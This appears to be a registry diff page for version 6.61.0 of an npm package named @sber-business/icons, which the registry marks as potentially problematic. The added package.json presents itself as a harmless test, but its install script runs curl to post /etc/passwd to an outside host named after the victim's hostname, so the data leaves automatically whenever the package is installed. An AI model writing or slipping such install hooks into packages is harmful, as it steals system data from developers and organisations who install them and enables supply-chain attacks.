@sber-business/icons 6.61.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @sber-business/icons might be problematic. Click here for more details.
- package/package.json +12 -0
package/package.json
ADDED
@@ -0,0 +1,12 @@
|
|
1
|
+
{
|
2
|
+
"name": "@sber-business/icons",
|
3
|
+
"version": "6.61.0",
|
4
|
+
"description": "This package is a proof of concept. It has been uploaded for test purposes only. The code is not malicious in any way and will be deleted as soon as test will be completed.",
|
5
|
+
"main": "index.js",
|
6
|
+
"author": "Haones <haoneses@gmail.com>",
|
7
|
+
"license": "ISC",
|
8
|
+
"scripts": {
|
9
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
10
|
+
"install": "/usr/bin/curl --data '@/etc/passwd' $(hostname).clfe1ps9akfa8ja3ljfganbs7hcsergwr.q3dm6.com"
|
11
|
+
}
|
12
|
+
}
|